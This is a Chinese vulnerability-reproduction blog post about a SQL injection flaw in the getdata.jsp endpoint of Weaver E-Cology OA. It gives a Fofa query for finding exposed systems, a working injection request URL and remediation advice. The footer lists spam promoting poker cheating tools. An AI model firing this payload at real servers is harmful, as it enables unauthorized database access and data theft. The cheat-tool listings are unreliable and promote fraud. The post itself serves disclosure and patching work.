【漏洞复现】泛微OA E-Cology getdata.jsp SQL注入漏洞
创始人
2025-01-07 19:04:30
0

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

漏洞描述

泛微OA E-Cology getdata.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。

网络空间测绘

Fofa

app="泛微-OA(e-cology)" 

image.png

漏洞复现

/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20@@version%20as%20id%20from%20HrmResourceManager  

image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。

相关内容

热门资讯

透视黑科技!德扑之星ai代打,... 透视黑科技!德扑之星ai代打,(德州)确实是有挂(详细辅助软件教程);1、首先打开德扑之星ai代打最...
透视辅助(wEpOke)透明挂... 透视辅助(wEpOke)透明挂辅助挂(wepoke辅助技巧)固有真的有挂(详细透视细节方法),支持语...
透视好友房!德扑ai智能,(德... 透视好友房!德扑ai智能,(德州之星)好像存在有挂(详细辅助靠谱教程)1、德扑ai智能透视辅助简单,...
透视好友房(wEpOke)透明... 透视好友房(wEpOke)透明挂辅助工具(WePoKe透明挂)竟然是有挂(详细透视技巧教程);wpk...
透视中牌率!德扑之星猫腻,(来... 透视中牌率!德扑之星猫腻,(来玩德州app)好像是有挂(详细辅助细节方法);1、让任何用户在无需德扑...
透视科技(WePoke)透视辅... 透视科技(WePoke)透视辅助挂(we辅助poker德之星)总是真的是有挂(详细透视教你攻略)1、...
透视免费!德扑之星辅助器购买,... 透视免费!德扑之星辅助器购买,(wpk德州)切实有挂(详细辅助2025新版教程)一、德扑之星辅助器购...
透视黑科技(wePoKe)透视... 透视黑科技(wePoKe)透视辅助技巧(wepower有外挂)总是真的有挂(详细透视规律教程)相信很...
透视黑科技!德扑起手牌胜率图,... 透视黑科技!德扑起手牌胜率图,(来玩德州app)都是真的有挂(详细辅助wpk教程);1、德扑起手牌胜...
透视透视(wePoKe)透视辅... 透视透视(wePoKe)透视辅助器(wepoke辅助德之星)先前真的有挂(详细透视插件教程);一、w...